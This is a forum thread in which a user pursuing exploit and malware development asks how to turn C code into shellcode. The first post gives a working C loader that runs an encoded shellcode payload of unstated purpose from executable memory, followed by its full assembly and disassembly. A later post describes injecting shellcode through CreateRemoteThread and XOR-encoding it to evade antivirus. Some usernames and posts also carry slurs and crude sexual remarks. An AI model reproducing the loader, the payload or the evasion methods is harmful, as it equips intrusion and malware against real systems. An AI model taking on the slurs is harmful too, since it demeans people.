User Controls

C to Binary. Dissassembled C Binaries, and C to Asm Conversions

  1. #1
    Sophie Pedophile Tech Support
    So i've been messing around with some low level stuff for a bit now in order to become more proficient for reasons of exploit and malware development.

    Keep in mind that i come from a Python background so don't judge me too harshly as i am determined to git gud, senpais.

    I'd like to be able to write a kernel exploit, module or rootkit in C entirely at some point and maybe even write malicious firmware in Asm and C but in the mean time i am also learning the .NET suite of languages. However while that is going on, it so happens that i can cheat a little with Python and it's `ctypes` lib as well by using it to inject shellcode, if i want. This is especially handy if i want to incorporate shellcode into a python based malware as either an in script exploit or other added functionality.

    If i am feeling especially lazy i can have Metasploit generate appropriate shellcode for me. If i have some binary Asm file it's not too difficult to extract a hex representation of the binary data as well. That being said...

    Not being very proficient in Asm itself limits my ability to create custom shellcodes however. As an intermediary step i've sought to see if it were possible to go from a C file to Asm the resulting Asm would be converted to shellcode as needed. The manner in which the shellcode is to be executed could be later determined.

    What i also want to find out is whether it's possible to have C source designed to launch shellcode, take that source, convert it to Asm or compile it and disassemble it later.

    I started out with this C program.


    #include <stdio.h>
    #include <stdlib.h>
    #include <errno.h>
    #include <string.h>
    #include <sys/mman.h>

    #define BUFSIZE 4096
    #define DEBUGGING 0

    /* Notice the shellcode already present, (protip don't run it) */

    char shellcode[] = "\xd9\xea\xd9\x74\x24\xf4\xbd\x8f\x1e\x9a\x87\x58\x29\xc9\xb1"
    "\x61\x31\x68\x18\x03\x68\x18\x83\xe8\x73\xfc\x6f\x6c\xd1\x30"
    "\x50\xf8\xd1\xb1\x51\x29\x4a\xe6\x60\x0e\x5d\xc6\x2f\x71\x5e"
    "\xc3\x2e\xb1\xe3\x34\x30\x40\x10\x05\xfa\xaf\xef\x4d\xa5\xf4"
    "\x7b\x51\x16\xe0\x5d\x96\x1f\x26\xea\x59\x1c\x4c\xa8\x5b\x24"
    "\xdf\x34\x5e\x84\x54\x74\x7e\xa9\x77\x76\x96\x72\x78\x89\x99"
    "\x2e\x0c\x3e\x42\x5c\x1e\xca\xec\xd5\x1b\x8b\xd5\x16\xdc\x0b"
    "\x16\x62\x78\x17\x9b\x68\x65\xac\xa7\x13\x14\xb6\xa5\xd0\x16"
    "\x7f\xcd\x77\x68\x7f\x0e\x78\x02\x3f\x02\xf3\x54\xa3\x91\x53"
    "\x5d\x50\xdd\x73\xd6\x66\x24\x3b\xf0\x13\xab\xab\x64\x80\x49"
    "\x87\x0d\x26\xef\xb0\xc8\x2e\x48\xea\xe7\x95\xfe\x85\x98\x8b"
    "\x29\xc1\x1f\xc4\x90\xfe\x48\xdc\xf9\x4f\x47\x88\xdd\x6d\x42"
    "\x7b\x57\x68\x19\x7c\x3e\x42\x21\x01\x39\xa5\xa8\x09\xeb\x4d"
    "\x4e\x9a\x4f\xb6\x73\x63\x9f\x3f\x49\xc2\x71\xcb\x02\x49\x71"
    "\x23\xf1\x4e\x8d\x4c\x5f\xe0\x35\x51\x80\x89\x5f\x7e\x4e\x61"
    "\x40\x7e\xae\x8e\x19\xec\x38\x16\x95\xc0\xde\xba\x35\x1d\xf4"
    "\x3c\x98\x77\x1d\x99\xad\x47\x10\xcb\xfc\x05\x39\xe8\x52\xc0"
    "\xbe\x86\x52\x14\xc1\x96\x05\x9f\x9c\x02\x55\x4c\x4e\xa9\x45"
    "\x77\x5e\x7f\xc7\xf5\xfc\x5b\xec\x56\xaf\xf1\xbe\x0a\x27\xd5"
    "\x3e\xa2\xb7\x45\xb4\xe9\xbf\x9a\x19\xee\xb4\x40\x9a\x9a\x68"
    "\x84\x5d\x4f\x1f\x12\xbf\x70\x20\x1a\x90\x18\x20\x0a\x10\xd9"
    "\x4a\x2b\x9d\x5f\x90\x2b\x9d\x5f\xf5\xa6\x1b\x4f\xf5\xb8\x23"
    "\x20\x9f\xb4\xae\x86\x57\x94\x3b\x5b\x68\xeb\xef\x0c\xa0\x13"
    "\x10\xcd\xbb\x4e\x14\x32\x68\xf9\xed\x4f\xc9\xf1\x0c\xb2\x5b"
    "\x6b\x0f\xb9\x39\x7b\xf0\x6e\x29\x06\xf1\x6e\x55\xa4\x0d\xcd"
    "\xaa\x7a\x0e\xb1\xaa\xc1\x0e\x73\xab\x99\x0e\x83\xab\x6f\x0f"
    "\xd7\xab\x29\x0f\x84\xab\xb5\x0f\x72\xac\xb5\x0f\xd7\x25\x50"
    "\x3e\x17\x75\xc7\x83\x9b\x76";

    int main(int argc, char* argv[])
    {
    size_t len;
    char *buf, *ptr;

    buf = mmap(NULL, BUFSIZE, PROT_READ | PROT_WRITE | PROT_EXEC, MAP_ANONYMOUS | MAP_PRIVATE, 0, 0);
    ptr = buf;

    #if DEBUGGING
    ptr[0] = '\xcc';
    ptr++;
    #endif

    len = sizeof(shellcode);

    memcpy(ptr, shellcode, len);

    (*(void (*)()) buf)();

    return 0;
    }


    I ran the preprocessor over it without actually assembling it. Like so:


    gcc -S -o my_asm_output.s example.c


    This gave me the following as output.


    .file "example.c"
    .text
    .globl shellcode
    .data
    .align 32
    .type shellcode, @object
    .size shellcode, 413
    shellcode:
    .ascii "\331\352\331t$\364\275\217\036\232\207X)\311\261a1h\030\003h"
    .ascii "\030\203\350s\374ol\3210P\370\321\261Q)J\346`\016]\306/q^\303"
    .ascii ".\261\34340@\020\005\372\257\357M\245\364{Q\026\340]\226\037"
    .ascii "&\352Y\034L\250[$\3374^\204Tt~\251wv\226rx\211\231.\f>B\\\036"
    .ascii "\312\354\325\033\213\325\026\334\013\026bx\027\233he\254\247"
    .ascii "\023\024\266\245\320\026\177\315wh\177\016x\002?\002\363T\243"
    .ascii "\221S]P\335s\326f$;\360\023\253\253d\200I\207\r&\357\260\310"
    .string ".H\352\347\225\376\205\230\213)\301\037\304\220\376H\334\371OG\210\335mB{Wh\031|>B!\0019\245\250\t\353MN\232O\266sc\237?I\302q\313\002Iq#\361N\215L_\3405Q\200\211_~Na@~\256\216\031\3548\026\225\300\336\2725\035\364<\230w\035\231\255G\020\313\374\0059\350R\300\276\206R\024\301\226\005\237\234\002ULN\251Ew^\177\307\365\374[\354V\257\361\276\n'\325>\242\267E\264\351\277\232\031\356\264@\232\232h\204]O\037\022\277p \032\220\030 \n\020\331J+\235_\220+\235_\365\246\033O\365\270# \237\264\256\206W\224;[h\353\357\f\240\023\020\315\273N\0242h\371\355O\311\361\f\262[k\017\2719{\360n)\006\361nU\244\r\315\252z\016\261\252\301\016s\253\231\016\203\253o\017\327\253)\017\204\253\265\017r\254\265\017\327%P>\027u\307\203\233v"
    .text
    .globl main
    .type main, @function
    main:
    mov ebp, esp; for correct debugging
    .LFB6:
    .cfi_startproc
    pushq %rbp
    .cfi_def_cfa_offset 16
    .cfi_offset 6, -16
    movq %rsp, %rbp
    .cfi_def_cfa_register 6
    subq $48, %rsp
    movl %edi, -36(%rbp)
    movq %rsi, -48(%rbp)
    movl $0, %r9d
    movl $0, %r8d
    movl $34, %ecx
    movl $7, %edx
    movl $4096, %esi
    movl $0, %edi
    call mmap@PLT
    movq %rax, -24(%rbp)
    movq -24(%rbp), %rax
    movq %rax, -16(%rbp)
    movq $413, -8(%rbp)
    movq -8(%rbp), %rdx
    movq -16(%rbp), %rax
    leaq shellcode(%rip), %rsi
    movq %rax, %rdi
    call memcpy@PLT
    movq -24(%rbp), %rdx
    movl $0, %eax
    call *%rdx
    movl $0, %eax
    leave
    .cfi_def_cfa 7, 8
    ret
    .cfi_endproc
    .LFE6:
    .size main, .-main
    .ident "GCC: (Ubuntu 8.3.0-6ubuntu1) 8.3.0"
    .section .note.GNU-stack,"",@progbits


    Which i thought kind of looked like Asm, but the old shellcode from the C file looks all kinds of messed up. Not quite sure if that's how it's supposed to look. Because usually when i have a Binary Asm file it looks like below.


    xor eax,eax
    push eax
    push 0x22657841
    pop eax
    shr eax,0x08
    push eax
    mov eax,0x1d4f211f
    mov ebx,0x78614473
    xor eax,ebx


    Which i can then convert to shellcode with the following operations.


    objdump -d ./PROGRAM|grep '[0-9a-f]:'|grep -v 'file'|cut -f2 -d:|cut -f1-6 -d' '|tr -s ' '|tr '\t' ' '|sed 's/ $//g'|sed 's/ /\\x/g'|paste -d '' -s |sed 's/^/"/'|sed 's/$/"/g'


    However since that didn't happen i straight up compiled the C file with `gcc -o my_asm_output example.c` which i then dissassembled with `objdump -S --disassemble my_asm_output > my_asm_output.dump` which led to the code block you see below.



    my_asm_output: file format elf64-x86-64


    Disassembly of section .init:

    0000000000001000 <_init>:
    1000: 48 83 ec 08 sub $0x8,%rsp
    1004: 48 8b 05 dd 2f 00 00 mov 0x2fdd(%rip),%rax # 3fe8 <__gmon_start__>
    100b: 48 85 c0 test %rax,%rax
    100e: 74 02 je 1012 <_init+0x12>
    1010: ff d0 callq *%rax
    1012: 48 83 c4 08 add $0x8,%rsp
    1016: c3 retq

    Disassembly of section .plt:

    0000000000001020 <.plt>:
    1020: ff 35 92 2f 00 00 pushq 0x2f92(%rip) # 3fb8 <_GLOBAL_OFFSET_TABLE_+0x8>
    1026: ff 25 94 2f 00 00 jmpq *0x2f94(%rip) # 3fc0 <_GLOBAL_OFFSET_TABLE_+0x10>
    102c: 0f 1f 40 00 nopl 0x0(%rax)

    0000000000001030 <mmap@plt>:
    1030: ff 25 92 2f 00 00 jmpq *0x2f92(%rip) # 3fc8 <mmap@GLIBC_2.2.5>
    1036: 68 00 00 00 00 pushq $0x0
    103b: e9 e0 ff ff ff jmpq 1020 <.plt>

    0000000000001040 <memcpy@plt>:
    1040: ff 25 8a 2f 00 00 jmpq *0x2f8a(%rip) # 3fd0 <memcpy@GLIBC_2.14>
    1046: 68 01 00 00 00 pushq $0x1
    104b: e9 d0 ff ff ff jmpq 1020 <.plt>

    Disassembly of section .plt.got:

    0000000000001050 <__cxa_finalize@plt>:
    1050: ff 25 a2 2f 00 00 jmpq *0x2fa2(%rip) # 3ff8 <__cxa_finalize@GLIBC_2.2.5>
    1056: 66 90 xchg %ax,%ax

    Disassembly of section .text:

    0000000000001060 <_start>:
    1060: 31 ed xor %ebp,%ebp
    1062: 49 89 d1 mov %rdx,%r9
    1065: 5e pop %rsi
    1066: 48 89 e2 mov %rsp,%rdx
    1069: 48 83 e4 f0 and $0xfffffffffffffff0,%rsp
    106d: 50 push %rax
    106e: 54 push %rsp
    106f: 4c 8d 05 aa 01 00 00 lea 0x1aa(%rip),%r8 # 1220 <__libc_csu_fini>
    1076: 48 8d 0d 43 01 00 00 lea 0x143(%rip),%rcx # 11c0 <__libc_csu_init>
    107d: 48 8d 3d c1 00 00 00 lea 0xc1(%rip),%rdi # 1145 <main>
    1084: ff 15 56 2f 00 00 callq *0x2f56(%rip) # 3fe0 <__libc_start_main@GLIBC_2.2.5>
    108a: f4 hlt
    108b: 0f 1f 44 00 00 nopl 0x0(%rax,%rax,1)

    0000000000001090 <deregister_tm_clones>:
    1090: 48 8d 3d 29 31 00 00 lea 0x3129(%rip),%rdi # 41c0 <__TMC_END__>
    1097: 48 8d 05 22 31 00 00 lea 0x3122(%rip),%rax # 41c0 <__TMC_END__>
    109e: 48 39 f8 cmp %rdi,%rax
    10a1: 74 15 je 10b8 <deregister_tm_clones+0x28>
    10a3: 48 8b 05 2e 2f 00 00 mov 0x2f2e(%rip),%rax # 3fd8 <_ITM_deregisterTMCloneTable>
    10aa: 48 85 c0 test %rax,%rax
    10ad: 74 09 je 10b8 <deregister_tm_clones+0x28>
    10af: ff e0 jmpq *%rax
    10b1: 0f 1f 80 00 00 00 00 nopl 0x0(%rax)
    10b8: c3 retq
    10b9: 0f 1f 80 00 00 00 00 nopl 0x0(%rax)

    00000000000010c0 <register_tm_clones>:
    10c0: 48 8d 3d f9 30 00 00 lea 0x30f9(%rip),%rdi # 41c0 <__TMC_END__>
    10c7: 48 8d 35 f2 30 00 00 lea 0x30f2(%rip),%rsi # 41c0 <__TMC_END__>
    10ce: 48 29 fe sub %rdi,%rsi
    10d1: 48 c1 fe 03 sar $0x3,%rsi
    10d5: 48 89 f0 mov %rsi,%rax
    10d8: 48 c1 e8 3f shr $0x3f,%rax
    10dc: 48 01 c6 add %rax,%rsi
    10df: 48 d1 fe sar %rsi
    10e2: 74 14 je 10f8 <register_tm_clones+0x38>
    10e4: 48 8b 05 05 2f 00 00 mov 0x2f05(%rip),%rax # 3ff0 <_ITM_registerTMCloneTable>
    10eb: 48 85 c0 test %rax,%rax
    10ee: 74 08 je 10f8 <register_tm_clones+0x38>
    10f0: ff e0 jmpq *%rax
    10f2: 66 0f 1f 44 00 00 nopw 0x0(%rax,%rax,1)
    10f8: c3 retq
    10f9: 0f 1f 80 00 00 00 00 nopl 0x0(%rax)

    0000000000001100 <__do_global_dtors_aux>:
    1100: 80 3d b6 30 00 00 00 cmpb $0x0,0x30b6(%rip) # 41bd <_edata>
    1107: 75 2f jne 1138 <__do_global_dtors_aux+0x38>
    1109: 55 push %rbp
    110a: 48 83 3d e6 2e 00 00 cmpq $0x0,0x2ee6(%rip) # 3ff8 <__cxa_finalize@GLIBC_2.2.5>
    1111: 00
    1112: 48 89 e5 mov %rsp,%rbp
    1115: 74 0c je 1123 <__do_global_dtors_aux+0x23>
    1117: 48 8b 3d ea 2e 00 00 mov 0x2eea(%rip),%rdi # 4008 <__dso_handle>
    111e: e8 2d ff ff ff callq 1050 <__cxa_finalize@plt>
    1123: e8 68 ff ff ff callq 1090 <deregister_tm_clones>
    1128: c6 05 8e 30 00 00 01 movb $0x1,0x308e(%rip) # 41bd <_edata>
    112f: 5d pop %rbp
    1130: c3 retq
    1131: 0f 1f 80 00 00 00 00 nopl 0x0(%rax)
    1138: c3 retq
    1139: 0f 1f 80 00 00 00 00 nopl 0x0(%rax)

    0000000000001140 <frame_dummy>:
    1140: e9 7b ff ff ff jmpq 10c0 <register_tm_clones>

    0000000000001145 <main>:
    1145: 55 push %rbp
    1146: 48 89 e5 mov %rsp,%rbp
    1149: 48 83 ec 30 sub $0x30,%rsp
    114d: 89 7d dc mov %edi,-0x24(%rbp)
    1150: 48 89 75 d0 mov %rsi,-0x30(%rbp)
    1154: 41 b9 00 00 00 00 mov $0x0,%r9d
    115a: 41 b8 00 00 00 00 mov $0x0,%r8d
    1160: b9 22 00 00 00 mov $0x22,%ecx
    1165: ba 07 00 00 00 mov $0x7,%edx
    116a: be 00 10 00 00 mov $0x1000,%esi
    116f: bf 00 00 00 00 mov $0x0,%edi
    1174: e8 b7 fe ff ff callq 1030 <mmap@plt>
    1179: 48 89 45 e8 mov %rax,-0x18(%rbp)
    117d: 48 8b 45 e8 mov -0x18(%rbp),%rax
    1181: 48 89 45 f0 mov %rax,-0x10(%rbp)
    1185: 48 c7 45 f8 9d 01 00 movq $0x19d,-0x8(%rbp)
    118c: 00
    118d: 48 8b 55 f8 mov -0x8(%rbp),%rdx
    1191: 48 8b 45 f0 mov -0x10(%rbp),%rax
    1195: 48 8d 35 84 2e 00 00 lea 0x2e84(%rip),%rsi # 4020 <shellcode>
    119c: 48 89 c7 mov %rax,%rdi
    119f: e8 9c fe ff ff callq 1040 <memcpy@plt>
    11a4: 48 8b 55 e8 mov -0x18(%rbp),%rdx
    11a8: b8 00 00 00 00 mov $0x0,%eax
    11ad: ff d2 callq *%rdx
    11af: b8 00 00 00 00 mov $0x0,%eax
    11b4: c9 leaveq
    11b5: c3 retq
    11b6: 66 2e 0f 1f 84 00 00 nopw %cs:0x0(%rax,%rax,1)
    11bd: 00 00 00

    00000000000011c0 <__libc_csu_init>:
    11c0: 41 57 push %r15
    11c2: 49 89 d7 mov %rdx,%r15
    11c5: 41 56 push %r14
    11c7: 49 89 f6 mov %rsi,%r14
    11ca: 41 55 push %r13
    11cc: 41 89 fd mov %edi,%r13d
    11cf: 41 54 push %r12
    11d1: 4c 8d 25 d8 2b 00 00 lea 0x2bd8(%rip),%r12 # 3db0 <__frame_dummy_init_array_entry>
    11d8: 55 push %rbp
    11d9: 48 8d 2d d8 2b 00 00 lea 0x2bd8(%rip),%rbp # 3db8 <__init_array_end>
    11e0: 53 push %rbx
    11e1: 4c 29 e5 sub %r12,%rbp
    11e4: 48 83 ec 08 sub $0x8,%rsp
    11e8: e8 13 fe ff ff callq 1000 <_init>
    11ed: 48 c1 fd 03 sar $0x3,%rbp
    11f1: 74 1b je 120e <__libc_csu_init+0x4e>
    11f3: 31 db xor %ebx,%ebx
    11f5: 0f 1f 00 nopl (%rax)
    11f8: 4c 89 fa mov %r15,%rdx
    11fb: 4c 89 f6 mov %r14,%rsi
    11fe: 44 89 ef mov %r13d,%edi
    1201: 41 ff 14 dc callq *(%r12,%rbx,8)
    1205: 48 83 c3 01 add $0x1,%rbx
    1209: 48 39 dd cmp %rbx,%rbp
    120c: 75 ea jne 11f8 <__libc_csu_init+0x38>
    120e: 48 83 c4 08 add $0x8,%rsp
    1212: 5b pop %rbx
    1213: 5d pop %rbp
    1214: 41 5c pop %r12
    1216: 41 5d pop %r13
    1218: 41 5e pop %r14
    121a: 41 5f pop %r15
    121c: c3 retq
    121d: 0f 1f 00 nopl (%rax)

    0000000000001220 <__libc_csu_fini>:
    1220: c3 retq

    Disassembly of section .fini:

    0000000000001224 <_fini>:
    1224: 48 83 ec 08 sub $0x8,%rsp
    1228: 48 83 c4 08 add $0x8,%rsp
    122c: c3 retq


    Which as you can see, looks a lot better. Now i was thinking i could just take the two columns on the right:


    xor %ebx,%ebx
    nopl (%rax)
    mov %r15,%rdx
    mov %r14,%rsi
    mov %r13d,%edi
    callq *(%r12,%rbx,8)


    And run my crazy `objdump` operation on it to get to shellcode.

    Would that work?

    What can i do better?

    If it wouldn't work, could you point me in the right direction?

    Any tips and/or advice is appreciated.
    The following users say it would be alright if the author of this post didn't die in a fire!
  2. #2
    Sophie Pedophile Tech Support
    Originally posted by Grylls if you wanna get tropical i’ll put banana in your pussy

    I guess you could say we really put the passion in the passion-fruit.

    Joking aside, consider this post as my official request for Lanny to remove any posts that don't have anything to do with the topic at hand.
    The following users say it would be alright if the author of this post didn't die in a fire!
  3. #3
    gadzooks Dark Matter [keratinize my mild-tasting blossoming]
    Not a lot of people are particularly proficient with assembly. I mean, I fucked around with it a bit a couple years ago simply as an educational exercise. It actually does serve a pretty strong educational purpose. When you realize that there are really only a couple dozen commands (pretty much all simple arithmetic at that), combined with some very simple branching ("GOTO", in a sense - AKA, "calling functions"), as well as ye olde hexadecimal memory storage (for assigning variables, and also constructing much more complex data structures)... It's kinda fascinating to just realize that's what all programming is reduced to once it's compiled.

    That being said, assembly still looks mostly like gibberish to me. I recognize the general structure, as well as the ol' "MOV x to y register" type stuff.

    Originally posted by Sophie This gave me the following as output.


    .file "example.c"
    .text
    .globl shellcode
    .data
    .align 32
    .type shellcode, @object
    .size shellcode, 413
    .LFB6:
    .cfi_startproc
    pushq %rbp
    .cfi_def_cfa_offset 16
    .cfi_offset 6, -16
    movq %rsp, %rbp
    .cfi_def_cfa_register 6
    subq $48, %rsp
    movl %edi, -36(%rbp)
    movq %rsi, -48(%rbp)
    movl $0, %r9d
    movl $0, %r8d


    Which i thought kind of looked like Asm, but the old shellcode from the C file looks all kinds of messed up. Not quite sure if that's how it's supposed to look. Because usually when i have a Binary Asm file it looks like below.


    xor eax,eax
    push eax
    push 0x22657841
    pop eax
    shr eax,0x08
    push eax
    mov eax,0x1d4f211f
    mov ebx,0x78614473
    xor eax,ebx

    All I can say is that that first bit of code looks exactly like the kind of assembly code I wrote when I was experimenting with it.

    The latter snippet is definitely different (to me).

    But it might just be that the exact same code can just be represented quite differently, depending on what stage of the compilation/assembly OR disassembly it is at.

    Your shellcode might be different from what you expect it to look like for that reason alone.

    BUT, you might want to make sure you're running things in a sandboxed environment during initial testing. I just know I wouldn't really 100% trust some straight hexadecimal code, even if it was produced via a relatively trusted pipeline.
  4. #4
    aldra JIDF Controlled Opposition
    A couple of things:

    1. Shellcode is just raw machine code converted to hex to make it easier to type/compatible with ascii/utf8.

    2. There are different assembler syntax/notation standards. Compare NASM and MASM for example. The assembler interprets it into machine code similar to how a higher-level language does, so it's not surprising your C compiler's raw ASM output looks a little different to what you've seen elsewhere.

    3. (De?-)Compiling a C program to pure assembler instructions is going to be a lot bulkier and messier than writing the instructions by hand mostly because there's a lot of background stuff, memory management etc. that's included that you wouldn't normally care about.
  5. #5
    Sophie Pedophile Tech Support
    Originally posted by aldra A couple of things:

    1. Shellcode is just raw machine code converted to hex to make it easier to type/compatible with ascii/utf8.

    Yes i am aware, however, when it's in hex i can use Python's `ctypes` library to inject the shellcode via the CreateRemoteThread method, or other vector should one be available. This is especially useful, in the case of a malware that needs to launch an exploit for privilege escalation say, when you take into consideration that you can encode the shellcode with Polymorphic XOR just to name an encoding scheme, you're able to more easily evade AV solutions.

    Originally posted by aldra 2. There are different assembler syntax/notation standards. Compare NASM and MASM for example. The assembler interprets it into machine code similar to how a higher-level language does, so it's not surprising your C compiler's raw ASM output looks a little different to what you've seen elsewhere.

    3. (De?-)Compiling a C program to pure assembler instructions is going to be a lot bulkier and messier than writing the instructions by hand mostly because there's a lot of background stuff, memory management etc. that's included that you wouldn't normally care about.

    Right, the thing is though i am not proficient enough to write out Asm by hand. However, if i can write a function or operation in C and then take that function and transform it into shellcode that might be worthwile.
  6. #6
    Lanny Bird of Courage
    Originally posted by Sophie Which i thought kind of looked like Asm, but the old shellcode from the C file looks all kinds of messed up. Not quite sure if that's how it's supposed to look. Because usually when i have a Binary Asm file it looks like below.

    That is assembly, the assembler directives (e.g. ".ascii") might be syntax you haven't seen before. As the name suggests, they direct the assembler to do some operation. Sometimes it's a shorthand for something that would be more cumbersome to write out in assembly or sometimes it controls the binary layout.

    One thing to note is that "binary ASM file" is a bit of an oxymoron. People aren't always super precise with the language, but "assembly" files are still text files and non-executable, only after they go through the assembler do you get an actual binary that can be executed. This is also why the output of gcc to assembly looks different from what a disassembler spits out. The ASM produced my a compiler can still use directives and symbolic names like "shellcode", because the assembler will resolve these to addresses. Once assembly and linking happens though, the symbolic names and directives are dropped and actual addresses are burned into the binary, the disassembler can't reverse these operations so you typically won't see meaningful labels like "shellcode" in the disassembly, even though they're present in the ASM source.
    The following users say it would be alright if the author of this post didn't die in a fire!
  7. #7
    aldra JIDF Controlled Opposition
    Originally posted by Sophie Right, the thing is though i am not proficient enough to write out Asm by hand. However, if i can write a function or operation in C and then take that function and transform it into shellcode that might be worthwile.

    you can do that with a regular debugger but like I said, you'll end up getting a lot of 'junk' that you don't actually need and it'll blow out the size of your shellcode.
    The following users say it would be alright if the author of this post didn't die in a fire!
  8. #8
    Grylls Cum Looking Faggot [abrade this vocal tread-softly]
    Originally posted by Lanny That is assembly, the assembler directives (e.g. ".ascii") might be syntax you haven't seen before. As the name suggests, they direct the assembler to do some operation. Sometimes it's a shorthand for something that would be more cumbersome to write out in assembly or sometimes it controls the binary layout.

    One thing to note is that "binary ASM file" is a bit of an oxymoron. People aren't always super precise with the language, but "assembly" files are still text files and non-executable, only after they go through the assembler do you get an actual binary that can be executed. This is also why the output of gcc to assembly looks different from what a disassembler spits out. The ASM produced my a compiler can still use directives and symbolic names like "shellcode", because the assembler will resolve these to addresses. Once assembly and linking happens though, the symbolic names and directives are dropped and actual addresses are burned into the binary, the disassembler can't reverse these operations so you typically won't see meaningful labels like "shellcode" in the disassembly, even though they're present in the ASM source.

    you actually deleted my post?
  9. #9
    Lanny Bird of Courage
    Yes, and if you keep posting off-topic in this thread, including gripeing about your post being deleted, then I'm going to ban you too.
  10. #10
    Grylls Cum Looking Faggot [abrade this vocal tread-softly]
    sorry boss
  11. #11
    L41n Houston
    Originally posted by gadzooks When you realize that there are really only a couple dozen commands

    lol, maybe on a 6502...modern instruction sets have hundreds of instructions and are so beastly processors don't even run them directly a lot of times, they get converted to microcode.
  12. #12
    L41n Houston
    Originally posted by aldra 1. Shellcode is just raw machine code converted to hex to make it easier to type/compatible with ascii/utf8.

    Nitpick: that's not what shellcode *is* it's just the representation you often encounter it in.
  13. #13
    L41n Houston
    Originally posted by Sophie Right, the thing is though i am not proficient enough to write out Asm by hand. However, if i can write a function or operation in C and then take that function and transform it into shellcode that might be worthwile.

    At the end of the day the best thing to do is just learn some assembly, the platforms ABI, etc and get comfortable with it.

    The whole point of shell code is to pop a shell basically, so all you need to figure out is the basics to manipulate memory, jump into/out of code, make some syscalls etc. You can sort of do what you're trying to do of course, but at the end of the day you're gonna be limited in what you can exploit without and understanding of low level fundamentals and the ability to handcraft assembly.


    Once you have the basics down and have your basic exploit you can jump into a some code you wrote in a higher level language if you want.
    The following users say it would be alright if the author of this post didn't die in a fire!
  14. #14
    aldra JIDF Controlled Opposition
    Originally posted by L41n Nitpick: that's not what shellcode *is* it's just the representation you often encounter it in.

    yeah that's what I meant, just poor wording

    you're not spatulatzar or amie are you?
  15. #15
    L41n Houston
    Originally posted by aldra you're not spatulatzar or amie are you?

    No
  16. #16
    park police Tuskegee Airman
    ARM is the thing to learn nowadays
  17. #17
    Sophie Pedophile Tech Support
    Solid advice guys. Also sorry about the nomenclature, if i don't use the exact technical definitions of a term that's on me. I sometimes forget that a lot of security people aren't particularly gifted programmers.

    Guess that's me too, for now.

    Fundamentals. Sometimes i wonder if this would have been easier if i started off learning a low level language to begin with, but then again, learning that i can't cut corners anywhere in my pursuit of this has provided me with a mental clarity that i appreciate and need.
  18. #18
    park police Tuskegee Airman
    Originally posted by Sophie Sometimes i wonder if this would have been easier if i started off learning a low level language to begin with
    According to Jeff Duntemann and lifejunkie, and a bunch of other people, it would've been easier.
  19. #19
    L41n Houston
    Originally posted by Sophie Sometimes i wonder if this would have been easier if i started off learning a low level language to begin with

    Eh, maybe - maybe not. Knowing a higher level language can give you a point of reference when navigating the lower levels - especially today where there's so much going on in regard to exploits. Shell code is essentially just glue you use to seize total control of the state of the app and get it to do what you want. So the key is to exploits is understanding how higher level functions on a specific platform map to lower level code...you really only need to understand a few basic concepts to get a grasp on it, and then you can dive in deeper when targeting something in particular.

    Experience in a higher level language gives you exposure to a lot of high level concepts about program logic and execution flow, you just have to go back and back fill how that stuff is actually being accomplished.

    I think playing around with C code and seeing what sort of asm the compiler spits out is a good start it's just not gonna be how you actually construct your shell code.
  20. #20
    Admin African Astronaut
    I'm still stuck at Atmel.
Jump to Top